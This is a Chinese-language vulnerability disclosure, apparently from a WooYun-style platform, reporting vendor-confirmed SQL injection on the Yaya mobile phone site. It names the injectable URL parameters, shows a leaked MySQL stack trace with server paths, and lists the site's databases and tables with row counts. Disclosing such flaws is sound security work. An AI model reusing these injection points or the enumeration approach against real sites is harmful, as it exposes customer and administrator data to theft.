漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:丫丫手机网root权限注入整理
提交时间:2015-03-18 12:04
修复时间:2015-05-02 12:38
公开时间:2015-05-02 12:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情 披露状态:
2015-03-18: 细节已通知厂商并且等待厂商处理中 2015-03-18: 厂商已经确认,细节仅向厂商公开 2015-03-28: 细节向核心白帽子及相关领域专家公开 2015-04-07: 细节向普通白帽子公开 2015-04-17: 细节向实习白帽子公开 2015-05-02: 细节向公众公开
简要描述: 凑热闹
详细说明: 丫丫手机网 点: http://appweb.yaya888.com/activity.php?aid=38 通用注入点: order_info.php?orderid= 各城市通用 web server operating system: Windows 2008 web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8 back-end DBMS: MySQL >= 5.0.0
Fatal error: Uncaught exception 'Exception' with message ' MySQL Query Error<br> <b>SQL</b>: SELECT * FROM sys_phone_zhuanti WHERE id=38’ and status=1 LIMIT 1<br> <b>错误详情</b>: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '’ and status=1 LIMIT 1' at line 1<br> <b>错误代码</b>:1064<br>' in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php:178 Stack trace: #0 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php(24): TrunkMysql->error('MySQL Query Err...') #1 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(64): TrunkMysql->query('SELECT * FROM s...', Array) #2 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(103): TrunkModel->query('SELECT * FROM s...', Array, true) #3 D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkModel.class.php(94): TrunkModel->select() #4 D:\wwwroot\yaya_app_ftp\wwwroot\activity.php( in D:\wwwroot\yaya_app_ftp\wwwroot\Init\Trunk\TrunkMysql.class.php on line 178
available databases [10]: [*] baobao [*] information_schema [*] kmyaya [*] kmyaya6 [*] kmyaya_bak [*] kmyaya_bak2 [*] kmyaya_bak3 [*] mysql [*] test [*] yaya_appapi Database: kmyaya +------------------------+---------+ | Table | Entries | +------------------------+---------+ | oa_stock_archive | 4155088 | | oa_stock_detail | 2225331 | | oa_document | 678186 | | oa_user_login | 632461 | | oa_stock | 582150 | | oa_money_detail | 353629 | | oa_customer_log | 279368 | | oa_customer | 189993 | | sys_search | 170864 | | oa_ip | 169867 | | oa_service | 133194 | | sys_goods_price | 119658 | | oa_stock_booking | 114983 | | oa_stock_move | 110220 | | oa_iplogin | 88490 | | oa_user_log | 83881 | | sys_goods_price_edit | 72330 | | sys_client_records | 61834 | | sys_goods_with | 40973 | | sys_image | 38405 | | sys_weixin_openid | 37473 | | sys_comment | 36565 | | sys_user_login_log | 28094 | | coupon_verify | 24815 | | sys_admin_login | 23900 | | sys_member_care | 23355 | | webapp_init_log | 23203 | | sys_member_login | 22764 | | game_zhuanpan_open | 22118 | | sys_weixin_qrcode | 19958 | | sms_sended | 19732 | | sys_push_log | 16359 | | sys_member | 14638 | | game_zhuanpan_open_bak | 12594 | | sys_order_list | 11279 | | sys_article | 11258 | | oa_stock_inventory | 10715 | | sys_tracert | 10451 | | sys_goods_product | 10016 | | lottery_log | 10002 | | sys_yhm_codes | 9885 | | game_zhuanpan_user | 9785 | | sys_order | 9700 | | oa_wx_status | 9179 | | sys_verify | 7369 | | coupon_visits | 6842 | | oa_active_order | 6592 | | sys_admin_log | 6003 | | game_zhuanpan_user_bak | 5271 | | sys_district | 5026 | | sys_client_question | 4962 | | sys_goods | 4662 | | sys_weixin_user | 4353 | | sys_cup_taking | 3903 | | sys_goods_package | 3636 | | sys_address | 3385 | | sys_cup_comment | 2433 | | sys_user_everyday | 2266 | | sys_weixin_zan | 2229 | | sys_cart | 2171 | | oa_computer | 2023 | | sys_weixin_token | 1985 | | game_zhuanpan_gift | 1901 | | oa_offer_code | 1662 | | game_zhuanpan_gift_bak | 1151 | | sys_game_user | 1133 | | sms_sending | 1000 | | sys_cprice | 986 | | sys_weixin_user_msg | 844 | | sys_game_gift | 782 | | sys_game_order | 778 | | game_cd_gift | 743 | | sys_send_address | 690 | | oa_user | 686 | | oa_active_log | 663 | | sys_bai_nian | 533 | | game_cd_user | 489 | | oa_personnel_files | 460 | | oa_article | 456 | | sys_help_article | 434 | | sys_soft | 348 | | sys_soft_ver | 340 | | sys_nianhui_scores | 290 | | game_zhuanpan_pici | 281 | | sys_nianhui_uses | 232 | | sys_weixin_yaya | 228 | | sys_nianhui_user | 182 | | sys_app_fenlei | 173 | | sys_advertisement | 156 | | coupon_stuff | 147 | | sys_tearch_msg | 125 | | yy_comment | 124 | | sys_ads | 113 | | sys_brands | 109 | | sys_actgoods | 103 | | sys_yhm_rules | 98 | | oa_modlist | 91 | | sys_goods_with_price | 86 | | sys_product_cat | 84 | | sys_goods_cat | 80 | | sys_hot_links | 79 | | sys_brand | 70 | | oa_set_parameter | 66 | | sys_cup_match | 64 | | sys_nav | 64 | | oa_set_depart | 62 | | sys_ad_position | 57 | | sys_goods_type | 51 | | sys_client_phone | 46 | | oa_usergroup | 45 | | sys_friendlink | 44 | | sys_admin | 37 | | oa_set_shop | 33 | | sys_knowledge | 33 | | sys_index_goods | 32 | | sys_order_price_edit | 31 | | oa_money_account | 29 | | sys_phone_zhuanti | 29 | | oa_money_class | 27 | | sys_client_company | 27 | | webapp_auth_login | 26 | | sys_shops | 25 | | sys_yhm_codes3 | 24 | | lottery_activity | 23 | | oa_url | 23 | | sys_sites_shop | 22 | | lottery | 21 | | sys_shop | 21 | | sms_tpl | 18 | | sys_byself | 17 | | oa_reset | 13 | | sys_friend_link | 13 | | webapp_point | 13 | | sys_contract_config | 12 | | sys_sites | 12 | | sys_nianhui_shows | 11 | | oa_offer_task | 10 | | sys_wxmoney_test | 10 | | coupon_con | 8 | | oa_set_member_rank | 8 | | sys_article_cat | 8 | | webapp_upload_image | 8 | | webapp_upload_voice | 7 | | sys_game_batch | 6 | | oa_qwgh | 5 | | sys_ad | 4 | | sys_codesend | 4 | | sys_nav_type | 4 | | sys_contract_a | 3 | | sys_game_type | 3 | | sys_group | 3 | | sys_phone_zhuanti_tpl | 3 | | sys_specialprice | 3 | | webapp_share | 3 | | oa_customer_score_log | 2 | | sys_shopcart | 2 | | sys_site | 2 | | webapp_init | 2 | | oa_offer_event | 1 | | sms_user | 1 | | sys_contract | 1 | | sys_phone_num | 1 | | sys_up_views | 1 | | sys_web_youhui | 1 | +------------------------+---------+
ok
漏洞证明: 修复方案: 漏洞回应 厂商回应: 危害等级:高
漏洞Rank:10
确认时间:2015-03-18 12:36
厂商回复: 谢谢您
最新状态: 暂无